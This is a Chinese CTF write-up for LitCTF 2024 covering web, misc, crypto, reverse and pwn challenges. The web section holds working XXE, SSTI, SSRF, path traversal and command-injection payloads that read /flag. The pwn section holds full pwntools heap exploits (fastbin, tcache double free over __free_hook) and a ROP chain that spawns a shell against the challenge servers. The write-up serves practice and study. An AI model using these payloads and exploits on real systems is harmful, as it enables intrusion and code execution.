LitCTF2024部分wp

litctf wp

第一次ak了web和misc,非常激动,感谢lictf给我这个机会

最终成果

在这里插入图片描述

全靠队里的密码逆向✌带飞。一个人就砍了近一半的分数

这里是我们队的wp

web

exx

题目名反过来就是xxe,考察xxe,查看登录的数据包

在这里插入图片描述

发现传的就是xml数据,没过滤啥,基础的payload就出了

import requests
port=28926
username='&xxe;'
data=f"""<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag">]>
<user><username>{username}</username><password>123456</password></user>"""
url=f'http://node2.anna.nssctf.cn:{port}/doLogin.php'
res=requests.post(url=url,data=data)
print(res.text)

在这里插入图片描述

一个池子?

打开环境,看到回声两个字,就猜到是ssti,输入{{3*5}},

在这里插入图片描述

果然就是,本来还想fuzz一下黑名单,联想到xxe没有过滤,用基础payload也是一下就出了

{{lipsum.__globals__.__builtins__.__import__('os').popen('cat /flag').read()}}

SAS

没啥好说,按照他给的代码,写出base64后的对应的序列化数据即可,考反序列化至少也得搞个pop链吧。。。

exp

<?php
class User
{public $username='admin';public $password='secure_password';}
echo base64_encode(serialize(new User()));

浏览器也能套娃?

提示输入url,输入个百度的网址,回显了个百度的页面,就是考ssrf,也是没啥过滤,file协议就出了

file:///flag

背景查看器

一开始有个文件包含的提示代码,搞得我以为传url参数,结果没反应,后面发现有个改变主题的按钮,按下后有发送请求

在这里插入图片描述

所以参数是这个theme,也是没啥过滤,首页的代码提示是唬人的,直接目录穿越包含根目录的flag即可

exp

import requests
url='http://node1.anna.nssctf.cn:28117/'
file='../../../../../flag'
data={'theme':file}
res=requests.post(url=url,data=data)
print(res.text)

在这里插入图片描述

百万美元

源码

<?php
error_reporting(0);
$a = $_GET['a'];
$b = $_GET['b'];
$c = $_GET['c'];
if ($a !== $b && md5($a) == md5($b)) {if (!is_numeric($c) && $c > 2024) {echo "好康的";} else {die("干巴爹干巴爹先辈~");}}
else {die("开胃小菜))");
}

a 和b很明显传个md5是0e的就行,c传2025a即可,字符串和数字比较会转为数字,2025a转为2025

payload

?a=MMHUWUV&b=MAUXXQC&c=2025a

来到dollar.php

?php
//flag in 12.php
error_reporting(0);
if(isset($_GET['x'])){$x = $_GET['x'];if(!preg_match("/[a-z0-9;`|#'\"%&\x09\x0a><.,?*\-=\\[\]]/i", $x)){system("cat ".$x.".php");}
}else{highlight_file(__FILE__);
}
?>

ban掉了数字字母,还要构造出12,利用$(())构造出来0 ,取反一下$((~$(())))构造-1,然后把后面多个$((~$(())))像字符串一样拼在一起,shell执行就做减法运算,减到-13,再取反到12即可,

在这里插入图片描述

具体原理可看探机的bash-fuck项目

https://github.com/ProbiusOfficial/bashFuck?tab=readme-ov-file

还有这个大佬的文章也可以看一下

https://xz.aliyun.com/t/12242

payload

?x=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

在这里插入图片描述

misc

贪恋每分每秒

提示很明显了,laosebi 就是lsb,跑个随波逐流即可出flag

在这里插入图片描述

你说的对,但

一开始解压出来的二维码,扫一下转到了云原神,

发现二维码图片里有藏压缩包,foremost提取出来,解压一下发现是一个二维码被拆成了4个部分,还是用随波逐流,方形合并一下得到完整二维码图片,

扫一下就出了flag

LitCTF{Genshin_St@rt!!}

原铁启动

给了个图片

在这里插入图片描述

身为前原神和现星铁玩家,一下字认出了这是原神和星铁里的文字,网上找个对照表就可以出flag

原神:【图研所】提瓦特现行文字对照表-原神社区-米游社 (miyoushe.com) 通用文

星铁:【1.0版本考据】历时两个半月!铁道文字翻译!-原神社区-米游社 (miyoushe.com),

记得换flag头和转小写

LitCTF{good_gamer}

Everywhere we go

就给了一个wav,播放时感觉没啥问题,但我舍友听到了说感觉很奇怪,和原曲差别有点大,可能里面还是藏了东西,尝试用advacity,把采样率改小一点,这里用了1500,打开频谱图,就能看到中间有个flag

在这里插入图片描述

在这里插入图片描述

盯帧珍珠

乍一看是个丁真图片,一打开马上又变成其他的,用stegsolve把每一帧固定住,每帧找一下就能出flag

flag

LitCTF{You_are_really_staring_at_frames!}

舔到最后应有尽有

一打开,是一大堆base64字符串,感觉是base64隐写,puzzlesolver一把梭即可

在这里插入图片描述

LitCTF{TanJi_j1e_jie_n1_dAi_w0_z0u_b_}

太关键了

根据题目名,还有压缩包里的文件名,猜出这是关键词加密,题目提示某些字符频率很高,对keyword.txt里的东西进行词频分析即可出关键词bingo

在这里插入图片描述

然后关键词解密即可

LITCTF{i_miss_you_boss}

女装照流量

流量分析,因为只会看http,所以直接看

看到跟/uplaod/ma.php有很多交互,看看在干什么,找了最后一个来看

在这里插入图片描述

请求是一段很长的php代码,像是蚁剑流量,应答很明显是一个压缩包数据,里面有flag.php,把php代码url解码,格式化一下,得到很长一串,关键部分如下

$F = base64_decode(substr(get_magic_quotes_gpc() ? stripslashes($_POST["p2a4445380b252"]) : $_POST["p2a4445380b252"], 2));$fp = @fopen($F, "r");if (@fgetc($fp)) {@fclose($fp);@readfile($F);} else {echo("ERROR:// Can Not Read");}

$F应该就是一个文件的路径,然后readfile读取,根据响应包的内容,这应该是读取压缩包内容的,于是把响应包压缩包内容导出来,解压发现需要密码

然后就往上继续查看ma.php的请求和应答,看到这个时发现

在这里插入图片描述

关键词,adding ,stored,明显是压缩flag.php的命令的回显,所以请求的包一定是压缩的命令,其中应该有密码

于是,把上一个请求的9783流量包的php代码导出来,格式化,得到关键部分如下

$p = base64_decode(substr($_POST["da8af99c22690c"], 2));
$s = base64_decode(substr($_POST["j6d5aaa1b7e5ac"], 2));

然后代码中运行rce用到了p,post的da8af99c22690c参数应该就是命令,解码一下

在这里插入图片描述

得到密码,解压即可得到flag

the love

解压有个图片和wav,wav听起来挺正常的

发现图片中有一个压缩包,分离出来,继续解压发现是真加密,需要密码,一开始爆破了全数字失败,然后010查看图片时发现

在这里插入图片描述

很明显是掩码攻击,apchr跑一下就出了,中间缺失的是202405

压缩包解压后有个假flag,还有一个password.txt,里面的两遍base64后,是

在这里插入图片描述

带密钥的音频隐写,尝试deepsound工具,就出了flag


Crypto

small_e

低指数攻击,n很大,直接开三次方即可

from Crypto.Util.number import *
import mathc_list = [...]def cubic_root_to_ascii(numbers):ascii_chars = []for num in numbers:for i in range(0, 200):if i**3 == num:ascii_chars.append(chr(i))return ascii_charsascii_result = cubic_root_to_ascii(c_list)
print("".join(ascii_result))

small_e_plus

指数依旧比较小,而且可以猜测前几位明文是 LitCTF
爆破出指数,然后解密即可

n = 26287684934288536371438030224508784042871268975402791015134838900290249602701092702492594931306572692868654436714501196060619149020850402317982203575250568283872182497606239389480186694649979877566740647822434500023605871516831662099415987589808614777313595453727243531121031390104059097782466650186291076316486240197369759537327997880644540629964227584070506981319936888159712058406052247256554081989035415864476278146328967410452695134756792942103209740186339835071828587981271027235499355298543650516643100665039796305276163706693873611519506528344413021878980171629732211592839945004800782325172828561339662590291c_list = [...]c1 = ord("L")c = 2206795524649235905421691489826312664535869158473992241382107452229902627430789178221234450699214518235612692491501082306158268745610575202210170312762929300421312081998256557805289595256913161318967687803957784191522197708618872099119883772100567610799038030170491575261415069363292331223848994909959222662307903914818692008641789258455591462146141825906954662346647872459477376830019604449386735009274664469596162731339288162705222622464022019805917855614180415135305122287341306358535204977475464107550060171378721195970927993762052901722822033817371589592984818877687488499315074761849162622037910992107211284008for i in range(1000, 2000):if ((c1**i) % n) == c:print(i)breake = 1924ascii_chars = []
for num in c_list:for i in range(0, 200):if ((i**e) % n) == num:ascii_chars.append(chr(i))continue
print("".join(ascii_chars))

真签到

依旧是爆破指数,然后解密

c1 = ord("L")
c = 4124398080749553074619843072966405052653858760437326718059791703345965920503569739252697039258403095781261373084359291436131778873009458422798167842256401087702314540530419434366776728534830888673974354635857270349385440098865230210094489169761588857916363734220665484295067349289289937219722492065728599463
n = 53779688736203933047434881701980151653423802317221115318252054349550528639605402386823698507644560099402835048990108944258111185574422278737617624691459404487383205558495742477348096557609903091073482529108655721238870718736876917084894146112572318162754496404262394399247602930119945411919174294508800616891for i in range(2, 10**8):if pow(c1, i, n) == c:print(i)

这里得到 e = 9897777

n = 53779688736203933047434881701980151653423802317221115318252054349550528639605402386823698507644560099402835048990108944258111185574422278737617624691459404487383205558495742477348096557609903091073482529108655721238870718736876917084894146112572318162754496404262394399247602930119945411919174294508800616891
e = 9897777
c = [...]ascii_chars = []
for num in c:for i in range(0, 200):if pow(i, e, n) == num:ascii_chars.append(chr(i))continue
print("".join(ascii_chars))

polynomlal

直接算出pqr,解就完事了

from sympy import symbols, Eq, solve
from Crypto.Util.number import inverse, long_to_bytesPolynomial1 = 58154360680755769340954893572401748667033313354117942223258370092578635555451803701875246040822675770820625484823955325325376503299610647282074512182673844099014723538935840345806279326671621834884174315042653272845859393720044076731894387316020043030549656441366838837625687203481896972821231596403741150142
Polynomial2 = 171692903673150731426296312524549271861303258108708311216496913475394189393793697817800098242049692305164782587880637516028827647505093628717337292578359337044168928317124830023051015272429945829345733688929892412065424786481363731277240073380880692592385413767327833405744609781605297684139130460468105300760
Polynomial3 = 97986346322515909710602796387982657630408165005623501811821116195049269186902123564611531712164389221482586560334051304898550068155631792198375385506099765648724724155022839470830188199666501947166597094066238209936082936786792764398576045555400742489416583987159603174056183635543796238419852007348207068832p, q, r = symbols("p q r", integer=True)eq1 = Eq(p**2 + q, Polynomial1)
eq2 = Eq(q**2 + r, Polynomial2)
eq3 = Eq(r**2 + p, Polynomial3)
solutions = solve((eq1, eq2, eq3), (p, q, r))if solutions:p, q, r = solutions[0]print(p)print(q)print(r)import libnum
import gmpy2
e = 65537
p = 7625900647186256736313352208336189136024613525845451962194744676052072325262646533642163553090015734584960267587813894745414843037111074258730819958397631
q = 13103163880267648221851617296336865295731278851373488569182099549824826973560296247802058712197255433671825570972129891122274435889696663320490806634737981
r = 9898805297737495640281149403465681435952383402115255751446422784763742395898034378399391604085137196351802539935697155137226495010184322468562791581344399
n = p * q * r
c = 690029769225186609779381701643778761457138553080920444396078012690121613426213828722870549564971078807093600149349998980667982840018011505754141625901220546541212773327617562979660059608220851878701195162259632365509731746682263484332327620436394912873346114451271145412882158989824703847237437871480757404551113620810392782422053869083938928788602100916785471462523020232714027448069442708638323048761035121752395570167604059421559260760645061567883338223699900phi_n = (p - 1) * (q - 1) * (r - 1)
d = gmpy2.invert(e, phi_n)
m = pow(c, d, n)
print(libnum.n2s(int(m)))

polynomial_plus

升级版多项式,本来是直接用python解多项式方程的,但是跑了半天没跑出来
后来想到用二分查找 k,每次计算区间中间的数与 n 比较,判断是左右哪个区间,一下搞定

from Crypto.Util.number import *def calculate_p_q(k):p = k**10 + 22 * k**8 + 53 * k**6 - 22 * k**4 - 39 * k**2 + 114514q = k**9 + 10 * k**7 - 13 * k**6 - 2 * k**4 + 111 * k**2 + 1919810return p, qdef binary_search(n):low = 0high = 2**65while low <= high:mid = (low + high) // 2p, q = calculate_p_q(mid)if p * q == n:return midelif p * q < n:low = mid + 1else:high = mid - 1return Nonee = 65537
n = 343424787688946710828788193478518340184635630498236346907606509763011890082198311173501834898393322176325060349656021994088578448585570427399686920253145504431065451412326430233084073651599248661762036671841142048573051549474182586297565046285161375600990596119448538118327240405957845178956427810835797220204485242640945891970398041508724313442375608608662117158013
c = 300097152084696274516003269451037367405899874736667089358316145472977115856239312841307278390995620995063953407731245808077915106161525019835875978698148238617148929170257141762407514139479267867121064342168993486529889088067645866930029787500052390195406519896658384623575160091828173111087120708969655686251340535134778177193882787257773427670338018428731395437974k = binary_search(n)
p, q = calculate_p_q(k)
d = inverse(e, (p - 1) * (q - 1))
m = pow(c, d, n)print(long_to_bytes(m))

真easyRSA

刚开始看到题目中有 print(p) print(c),但是输出里没有 p,却有 c1 c2 想不明白
后面重新试着解了一下,原来是有两段

from Crypto.Util.number import *
import gmpy2
n = 111880903302112599361822243412777826052651261464069603671228695119729911614927471127031113870129416452329155262786735889603893196627646342615137280714187446627292465966881136599942375394018828846001863354234047074224843640145067337664994314496776439054625605421747689126816804916163793264559188427704647589521
p = gmpy2.iroot(n, 4)[0]
q = p**3
e = 65537
d = inverse(e, p**3 * (p - 1))
c1 = 78995097464505692833175221336110444691706720784642201874318792576886638370795877665241433503242322048462220941850261103929220636367258375223629313880314757819288233877871049903331061261182932603536690216472460424869498053787147893179733302705430645181983825884645791816106080546937178721898460776392249707560
c2 = 3784701757181065428915597927276042180461070890549646164035543821266506371502690247347168340234933318004928718562990468281285421981157783991138077081303219print(long_to_bytes(pow(c1, d, n)))
# LitCTF{HeRe_1s_Weak_F1aG}hahahaha_____hint_is_93492332457019255141294502555555489582661562346262162342211605562996217352449
q = 93492332457019255141294502555555489582661562346262162342211605562996217352449
e = 65537
n = p * q
d = inverse(e, (p - 1) * (q - 1))
print(long_to_bytes(pow(c2, d, n)))
# LitCTF{R1ght_Answ3r!}

common_primes

n1,n2 有公因数 p,得到 p 求解即可

from Crypto.Util.number import *e = 65537
n1 = 63306931765261881888912008095340470978772999620205174857271016152744820165330787864800482852578992473814976781143226630412780924144266471891939661312715157811674817013479316983665960087664430205713509995750877665395721635625035356901765881750073584848176491668327836527294900831898083545883834181689919776769
n2 = 73890412251808619164803968217212494551414786402702497903464017254263780569629065810640215252722102084753519255771619560056118922616964068426636691565703046691711267156442562144139650728482437040380743352597966331370286795249123105338283013032779352474246753386108510685224781299865560425114568893879804036573
c1 = 11273036722994861938281568979042367628277071611591846129102291159440871997302324919023708593105900105417528793646809809850626919594099479505740175853342947734943586940152981298688146019253712344529086852083823837309492466840942593843720630113494974454498664328412122979195932862028821524725158358036734514252
c2 = 42478690444030101869094906005321968598060849172551382502632480617775125215522908666432583017311390935937075283150967678500354031213909256982757457592610576392121713817693171520657833496635639026791597219755461854281419207606460025156812307819350960182028395013278964809309982264879773316952047848608898562420p = GCD(n1, n2)
q = n1 // p
phi_n = (p - 1) * (q - 1)
d = inverse(e, phi_n)
m = pow(c1, d, n1)
print(long_to_bytes(m))

common_primes_plus

复杂一点的式子,观察一下发现 hint1,hint2 依旧有公因数 p

from Crypto.Util.number import *
n1 = 72619153900682160072296441595808393095979917106156741746523649725579328293061366133340736822282117284050717527134297532031234706715551253283030119063143935874516054785948327252045453986903379262257406260016876625891582923191913450785482873961282498295762698500898694660964018533698142756095427829906473038053
hint1 = 115150932086321440397498980975794957800400136337062771258224890596200580556053305338941267789684878816176014493153795643655219028833232337281425177163963414534998897852644398384446019097451620742463880027107068960452304016955877225140421899265978792650445328111566277376529454404089066088845864500514742797060500618255170627
hint2 = 166820160267525807953634213157298160399912450930658918773153592459310847514047652216110562360456335336533080444219104489314586122760398361430693763814336759476811490524054588094610387417965626546375189720748660483054863693527537614055954695966458622029711055735399842018236940424665041143785192280089418185085532002136215976
c = 28378912671104261862184597375842174085651209464660064937481961814538145807266472966765374317717522401362019901110151858589886717440587644003368826809403188935808872400614919296641885383025657934630410406898092262104442977722339379234085663757182028529198392480656965957860644395092769333414671609962801212632e = 65537
p = GCD(hint1, hint2)
q = n1 // p
d = inverse(e, (p - 1) * (q - 1))
m = pow(c, d, n1)
print(long_to_bytes(m))

CRT

观察了一下,发现 c_list 中的值都是一样的,说明 e=10 指数较小,直接求 c 的 10 次方根即可

from Crypto.Util.number import *
import gmpy2
c = 644471004204038587358576160407417490938643306027967868486894032686145771114614076076527690366372762614045209015175209880518279715723521182568975220993976451106760236390912778371250746699463366097164369672789316408520079193370191810477580463635224092686607896863852671881543817329521589324466628227730589108339783619357530316049670209743367574983963078106666377633552745384690084183804939047320711873053569717432670155045869610477526046503868585690544254566603491357805849009447674789480061139157433156989123228768899846183291164697221164452100037658563026884070301188916984245139290761779580443049
m = gmpy2.iroot(c, 10)[0]
print(long_to_bytes(m))

little_fermat

p,q 相近,求解 n 的平方根,找相近即可
另外 x 是费马小定理的形式, x = q - 1

from Crypto.Util.number import *
import gmpy2e = 65537
n = 122719648746679660211272134136414102389555796575857405114496972248651220892565781331814993584484991300852578490929023084395318478514528533234617759712503439058334479192297581245539902950267201362675602085964421659147977335779128546965068649265419736053467523009673037723382969371523663674759921589944204926693
c = 109215817118156917306151535199288935588358410885541150319309172366532983941498151858496142368333375769194040807735053625645757204569614999883828047720427480384683375435683833780686557341909400842874816853528007258975117265789241663068590445878241153205106444357554372566670436865722966668420239234530554168928root, remainder = gmpy2.iroot(n, 2)
p = 0
q = 0
while True:p = n // rootif p * root == n:q = rootbreakroot = root - 1d = inverse(e, (p - 1) * (q - 1))
m = pow(c, d, n)
m = m ^ (q - 1)
print(long_to_bytes(m))

little_fermat_plus

x 变成了 n 倍的 x,爆破一下就行

from Crypto.Util.number import *
import gmpy2e = 65537
n = 169522900072954416356051647146585827691225327527086797334523482640452305793443986277933900273961829438217255938808371865341750200444086653241610669340348513884285892043530862971785487294831341653909852543469963032532560079879299447677636753647721541724969084825510405349373420839032990681851700075554428485967
c = 105943762023156641770119141175498496686312095002592803768522760959533958364969985856505466722378959991757667341747887520146437729810252085791886309974903778546814812093444837674447485802109225767800488527376777153844313243366001288246744190001997192598159277512188417272938455513900277907186067996704043274199root, remainder = gmpy2.iroot(n, 2)
p = 0
q = 0
while True:p = n // rootif p * root == n:q = rootbreakroot = root - 1d = inverse(e, (p - 1) * (q - 1))
m = pow(c, d, n)
print(m)for i in range(10000):am = m ^ (i * (q - 1))flag = long_to_bytes(am)if b"LitCTF" in flag:print(flag)break

Reverse

编码喵

看到主程序 base64 加密,然后看字符串
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/
tgL0q1rgEZaZmdm0zwq4lweYzgeTngfHnI1ImMm5ltaXywnLowuYnJmWmx0=
经典换表 base64
在这里插入图片描述

ezpython

python逆向题,用 pyinstxtractor 反编译,然后高版本的 python 无法用本地的 uncompyle6,上网找了个工具
在这里插入图片描述

在这里插入图片描述

又是换表base64
8kuWYm=1JiUPs7DT4x+X5tcqZKfGvA0gFLB6y3QbV2rNOlRdMwnEohjzSe9/HIa-
X=3o4hx=0EZwf=mMv13gX=3o4hx=qje2ZjtgZQmEKXZog4==
在这里插入图片描述

ezrc4

动态调试得到 key = litctf!
用 python 解密即可,注意字符串的大小端转换

def rc4_init(key):s = list(range(256))j = 0k = [key[i % len(key)] for i in range(256)]for i in range(256):j = (j + s[i] + k[i]) % 256s[i], s[j] = s[j], s[i]return sdef rc4_crypt(data, key):s = rc4_init(key)i = j = 0out = bytearray()for byte in data:i = (i + 1) % 256j = (j + s[i]) % 256s[i], s[j] = s[j], s[i]t = (s[i] + s[j]) % 256out.append(byte ^ s[t])return outkey = b"litctf!"
data = bytearray([0xD5,0xB2,0x7C,0xDC,0x90,0xA2,0x6E,0x60,0x06,0x13,0xE4,0x71,0x59,0xB0,0x90,0x31,0xB2,0xC7,0x1D,0xD7,0x7F,]
)
decrypted_data = rc4_crypt(data, key)
print(decrypted_data.decode("utf-8"))

得到 LitCTF{rc4_love_nice}

Pwn

不得不说,分配的相当清晰,从2.23的fastbin到2.27的tcache bin再到2.31的tcache bin key以及2.35和2.39的IO。从易到难,不过,不得不说,还是警醒我学IO,因为,不会IO,对着例题看了2.35瞪了一下午打不通的眼[躺],对了,加了一道小rop,不过重点在于溢出理解,没有很高的知识要求

heap-2.23

UAF后,可以轻易泄漏出libc基址,然后再通过fastbin attack直接写malloc_hook为one_gadget就行

from pwn import *libc = ELF("./libc.so.6")\# elf = ELF("./heap")\# libc = elf.libc\# io = process("./heap")io = remote("node2.anna.nssctf.cn", 28852)context(arch = 'amd64', os='linux', terminal='kitty')\# context.log_level = 'debug'dbg = lambda: (gdb.attach(io),pause())lg = lambda n,s: log.info('\033[1;1;20m%s: 0x%x <--\033[0m\033[1;3;20m %s \033[0m' % (str(n), eval(str(s)), s))def choose(choice):​     io.sendlineafter('>>', str(choice).encode())def alloc(id, size):choose(1)io.sendlineafter(b'idx?', str(id).encode())io.sendlineafter(b'size?', str(size).encode())def delete(id):choose(2)io.sendlineafter(b'idx?', str(id).encode())def edit(id, content):choose(4)io.sendlineafter(b'idx?', str(id).encode())io.sendlineafter(b'content :', content)def show(id):choose(3)io.sendlineafter(b'idx?', str(id).encode())alloc(0, 0x90)alloc(1, 0x10)delete(0)show(0)io.recvuntil(b'content : ')malloc_hook = u64(io.recv(6).ljust(8, b'\x00')) - 88 - 0x10lg("malloc_hook", malloc_hook)libcbase = malloc_hook - libc.sym['__malloc_hook']lg("libcbase", libcbase)realloc = libcbase + libc.sym['realloc']lg("realloc", realloc)l_gadget = [0x4525a, 0xef9f4, 0xf0897]r_gadget = [0x4527a, 0xf03a4, 0xf1247]one_gadget = libcbase + r_gadget[2]lg("one_gadget", one_gadget)alloc(2, 0x68)delete(2)edit(2, p64(malloc_hook - 0x23))alloc(3, 0x68)alloc(4, 0x68)edit(4, b'A'*0xb + p64(one_gadget) + p64(realloc + 0x8))alloc(5, 0x68)io.interactive()dbg()

heap-2.27

同样的UAF,泄漏后直接tcache double free,写free_hook为system地址,然后free掉包含/bin/sh\x00的堆块就行

from pwn import *libc = ELF("./libc.so.6")\# elf = ELF("./heap")\# libc = elf.libc\# io = process("./heap")io = remote("node1.anna.nssctf.cn", 28709)context(arch = 'amd64', os='linux', terminal='kitty')\# context.log_level = 'debug'dbg = lambda: (gdb.attach(io),pause())lg = lambda n,s: log.info('\033[1;1;20m%s: 0x%x <--\033[0m\033[1;3;20m %s \033[0m' % (str(n), eval(str(s)), s))def choose(choice):io.sendlineafter('>>', str(choice).encode())def alloc(id, size):choose(1)io.sendlineafter(b'idx?', str(id).encode())io.sendlineafter(b'size?', str(size).encode())def delete(id):choose(2)io.sendlineafter(b'idx?', str(id).encode())def edit(id, content):choose(4)io.sendlineafter(b'idx?', str(id).encode())io.sendafter(b'content :', content)def show(id):choose(3)io.sendlineafter(b'idx?', str(id).encode())alloc(0, 0x410)alloc(1, 0x10)delete(0)show(0)io.recvuntil(b'content : ')libcbase = u64(io.recv(6).ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']lg("libcbase", libcbase)free_hook = libcbase + libc.sym['__free_hook']lg("free_hook", free_hook)l_gadget = [0xe6aee, 0xe6af1, 0xe6af4]r_gadget = [0xe3afe, 0xe3b01, 0xe3b04]one_gadget = libcbase + l_gadget[0]lg("one_gadget", one_gadget)system = libcbase + libc.sym['system']
lg("system", system)alloc(2, 0x18)delete(2)edit(2, p64(free_hook))alloc(3, 0x18)
alloc(4, 0x18)
edit(3, b'/bin/sh\x00')edit(4, p64(system))delete(3)io.interactive()dbg()

heap-2.31

UAF再次出击,不仅可以泄漏,还可以清除掉tcache bin检查用的key,然后再次写free_hook(小记一个,2.32才有tcache bin的fd指针加密,我竟然花了十分钟才反应过来,第一个tcache里确实有一个加密用的地址,但是好像没用上,翻笔记才发现2.32才有这机制。。。)

from pwn import *# libc = ELF("./libc.so.6")elf = ELF("./heap")libc = elf.libcio = process("./heap")# io = remote("node1.anna.nssctf.cn", 28144)context(arch = 'amd64', os='linux', terminal='kitty')# context.log_level = 'debug'dbg = lambda: (gdb.attach(io),pause())lg = lambda n,s: log.info('\033[1;1;20m%s: 0x%x <--\033[0m\033[1;3;20m %s \033[0m' % (str(n), eval(str(s)), s))def choose(choice):​     io.sendlineafter('>>', str(choice).encode())def alloc(id, size):choose(1)io.sendlineafter(b'idx?', str(id).encode())io.sendlineafter(b'size?', str(size).encode())def delete(id):choose(2)io.sendlineafter(b'idx?', str(id).encode())def edit(id, content):choose(4)io.sendlineafter(b'idx?', str(id).encode())io.sendafter(b'content :', content)def show(id):choose(3)io.sendlineafter(b'idx?', str(id).encode())alloc(0, 0x410)alloc(1, 0x10)delete(0)show(0)io.recvuntil(b'content : ')libcbase = u64(io.recv(6).ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']lg("libcbase", libcbase)free_hook = libcbase + libc.sym['__free_hook']lg("free_hook", free_hook)l_gadget = [0xe6aee, 0xe6af1, 0xe6af4]r_gadget = [0xe3afe, 0xe3b01, 0xe3b04]one_gadget = libcbase + l_gadget[0]lg("one_gadget", one_gadget)system = libcbase + libc.sym['system']lg("system", system)alloc(2, 0x80)delete(2)delete(2)edit(2, p64(free_hook))alloc(4, 0x80)alloc(5, 0x80)edit(5, p64(system))gdb.attach(io)alloc(6, 0x10)edit(6, b'/bin/sh\x00')delete(6)io.interactive()dbg()

atm

其实蛮有意思,给了200的溢出距离,但是实际上给了修改函数,3可以增多,2可以减少,不过没用上2,直接不停的给3加0x200(实际上能溢出写进pop_rdi_ret,binsh,ret和system的地址就行了,但是直接就这么写了),只要有了足够长的溢出,就直接执行5泄漏后拿到binsh地址和system地址,然后正常rop,再记一下,有栈平衡问题,会卡住,要加个ret平衡栈,就这样

from pwn import *from LibcSearcher import *# io = process("./app")io = remote("node2.anna.nssctf.cn", 28651)elf = ELF("./app")libc = elf.libccontext.terminal = 'kitty'io.sendafter(b'password:', b'A'*0x10)main = elf.sym['main']asi = 1while asi:io.sendlineafter(b'4.Exit', b'3')io.sendlineafter(b'Please enter your deposit:', str(0x200).encode())io.sendlineafter(b'4.Exit', b'1')io.recvuntil(b'Your balance is:')asb = io.recvuntil(b'$', drop='True')if int(asb) > 0x200:​    asi = 0print(hex(int(asb)))io.sendlineafter(b'4.Exit', b'5')io.recvuntil(b'gift:')_addr = int(io.recvline()[:-1], 16)print(hex(_addr))libc = LibcSearcher('printf', _addr)libcbase = _addr - libc.dump('printf')# libcbase = _addr - libc.sym['printf']print(hex(libcbase))system = libcbase + libc.dump('system')binsh = libcbase + libc.dump('str_bin_sh')# system = libcbase + libc.sym['system']# binsh = libcbase + next(libc.search('/bin/sh'))print(hex(system))print(hex(binsh))pop_rdi_ret = 0x0000000000401233io.sendline(b'A'*(0x160+8) + p64(pop_rdi_ret) + p64(binsh) + p64(0x000000000040101a) + p64(system) + p64(main))# gdb.attach(io)io.sendlineafter(b'4.Exit', b'4')io.interactive()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/22657.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

机器学习中的泛化与适应:深入理解域泛化、域适应、少样本学习、零样本学习、开放世界识别与开放词汇识别

机器学习中的泛化与适应&#xff1a;深入理解域泛化、域适应、少样本学习、零样本学习、开放世界识别与开放词汇识别 &#x1f60e; 作者介绍&#xff1a;我是程序员行者孙&#xff0c;一个热爱分享技术的制能工人。计算机本硕&#xff0c;人工制能研究生。公众号&#xff1a;A…

Java Web学习笔记8——表单

表单标签&#xff1a; 场景&#xff1a;在网页中主要负责数据采集功能&#xff0c;如注册、登录等数据采集。 标签&#xff1a;<form> 表单项、表单元素&#xff1a; 不同类型的input元素、下拉列表、文本域等。 <input>: 定义表单项、通过type形式控制输入形…

深入解读Prometheus Adapter:云原生监控的核心组件

一、引言 Prometheus Adapter的背景与重要性 在现代的云原生架构中&#xff0c;微服务和容器化技术得到了广泛的应用。这些技术带来了系统灵活性和扩展性的提升&#xff0c;但同时也增加了系统监控和管理的复杂度。Prometheus作为一款开源的监控系统&#xff0c;因其强大的指标…

有关Qt的调用其他cpp文件出现的小问题

一开始出现了运行mainwindow文件过程调用其他cpp文件&#xff0c;而导致运行的ui界面卡住&#xff0c;后来发现在两个cpp文件中都进行了界面的初始化而导致界面的某些控件二次使用&#xff0c;所以会卡住。 ui->setupUi(this); 在Qt框架中&#xff0c;ui->setupUi(this)…

PPP-B2b精密产品使用注意事项及分析

1、因为在使用PPP-B2b进行定轨的时候&#xff0c;发的精密轨道产品是B3频点的&#xff0c;需要改正的卫星质心&#xff08;Com&#xff09;与SP3精密星历对比。 2、PPP-B2b产品吸收了电离层误差&#xff0c;因此电离层提取方面与IGS电离层完全无法对其。 3、由于PPP-B2b产品精…

元宇宙3D品牌营销虚拟场景提升客户对企业的黏性

在这个充满创意与想象的3D元宇宙时代&#xff0c;我们为您推出了全新的3D元宇宙场景在线制作编辑平台&#xff0c;让您轻松构建专属的虚拟展厅&#xff0c;展现无限可能。 3D元宇宙场景在线制作编辑平台允许您快速完成空间设计&#xff0c;根据您的个性化需求&#xff0c;自由设…

适合初学者人手一本的LLM大语言模型综述,爆火全网

今天给大家推荐一本大模型&#xff08;LLM&#xff09;这块的一本外文书&#xff0c;经过整理已经出中文版了&#xff0c;就是这本《大型语言模型综述》&#xff01;本书在git上有9.2k star&#xff0c;还是很不错的一本大模型方面的书。 本教程内容主要内容&#xff1a;中文版…

牛客热题:矩阵最长递增路径

&#x1f4df;作者主页&#xff1a;慢热的陕西人 &#x1f334;专栏链接&#xff1a;力扣刷题日记 &#x1f4e3;欢迎各位大佬&#x1f44d;点赞&#x1f525;关注&#x1f693;收藏&#xff0c;&#x1f349;留言 文章目录 牛客热题&#xff1a;矩阵最长递增路径题目链接方法一…

leetcode155 最小栈

题目 设计一个支持 push &#xff0c;pop &#xff0c;top 操作&#xff0c;并能在常数时间内检索到最小元素的栈。 实现 MinStack 类: MinStack() 初始化堆栈对象。void push(int val) 将元素val推入堆栈。void pop() 删除堆栈顶部的元素。int top() 获取堆栈顶部的元素。i…

关于LPC1768在线升级的实现的注意事项

开发环境&#xff1a;Keil 5 uVision V5.38.0.0 1、使用IAP的方式&#xff08;应用程序在线编程&#xff09; 2、在Flash中构建用于升级的不同区域 &#xff08;1&#xff09;引导区 &#xff08;2&#xff09;APP区 &#xff08;3&#xff09;升级代码存放区域 注意&…

阿里影业业绩大涨,除了沸腾的文娱市场还有什么原因?

